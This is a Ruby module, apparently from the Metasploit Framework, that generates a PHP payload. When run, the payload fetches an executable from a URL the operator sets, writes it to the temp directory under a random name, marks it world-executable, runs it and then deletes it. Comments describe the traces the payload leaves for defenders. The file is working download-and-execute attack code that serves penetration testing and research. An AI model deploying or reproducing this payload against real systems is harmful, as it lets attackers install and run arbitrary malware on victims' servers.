Path: blob/master/modules/payloads/singles/php/download_exec.rb
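##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Single PHP payload: #generate returns PHP source that fetches the file at
# the URL option, writes it to the temp directory, runs it and then deletes it.
#
# Behaviour of the generated PHP that is visible on the host running it:
# * the PHP process opens the URL with fopen(), which only works for remote
#   URLs when PHP's allow_url_fopen setting is enabled;
# * a randomly named "<letters>.exe" file is created in the directory reported
#   by sys_get_temp_dir() and set to mode 0777;
# * the file is unlinked right after the execution block, so process-creation
#   and outbound-connection telemetry from the PHP process are more dependable
#   evidence than a later search of the temp directory.
module MetasploitModule
  CachedSize = :dynamic

  include Msf::Payload::Php
  include Msf::Payload::Single

  # Registers the module metadata and its single required option.
  #
  # @param info [Hash] metadata passed through update_info to the parent
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'PHP Executable Download and Execute',
        'Description' => 'Download an EXE from an HTTP URL and execute it',
        'Author' => [ 'egypt' ],
        'License' => BSD_LICENSE,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Privileged' => false
      )
    )

    # EXITFUNC is not supported :/
    deregister_options('EXITFUNC')

    # Register command execution options
    register_options(
      [
        OptString.new('URL', [ true, 'The pre-encoded URL to the executable' ])
      ]
    )
  end

  # Builds the PHP source for this payload.
  #
  # The URL option is interpolated verbatim into a double-quoted PHP string,
  # which is why the option description asks for a pre-encoded value; nothing
  # in this method escapes it.
  #
  # php_preamble and php_system_block are defined outside this file
  # (presumably in Msf::Payload::Php -- confirm). Both calls now pass the
  # variable name under the same :disabled_varname key; the second call
  # spelled the key `disabled_varnam`, so the helper could not have seen it
  # under the name the first call uses.
  #
  # @return [String] PHP source text
  def php_exec_file
    # Random file name and PHP variable name, regenerated on every call.
    exename = Rex::Text.rand_text_alpha(4..11)
    dis = '$' + Rex::Text.rand_text_alpha(4..7)
    shell = <<-END_OF_PHP_CODE
    #{php_preamble(disabled_varname: dis)}
    if (!function_exists('sys_get_temp_dir')) {
      function sys_get_temp_dir() {
        if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
        if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }
        if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }
        $tempfile=tempnam(uniqid(rand(),TRUE),'');
        if (file_exists($tempfile)) {
          @unlink($tempfile);
          return realpath(dirname($tempfile));
        }
        return null;
      }
    }
    $fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";
    $fd_in = fopen("#{datastore['URL']}", "rb");
    if ($fd_in === false) { die(); }
    $fd_out = fopen($fname, "wb");
    if ($fd_out === false) { die(); }
    while (!feof($fd_in)) {
      fwrite($fd_out, fread($fd_in, 8192));
    }
    fclose($fd_in);
    fclose($fd_out);
    chmod($fname, 0777);
    $c = $fname;
    #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
    @unlink($fname);
    END_OF_PHP_CODE

    # return Rex::Text.compress(shell)
    return shell
  end

  #
  # Constructs the payload
  #
  # @param _opts [Hash] accepted for interface compatibility, not used here
  # @return [String] the PHP source produced by #php_exec_file
  def generate(_opts = {})
    return php_exec_file
  end
end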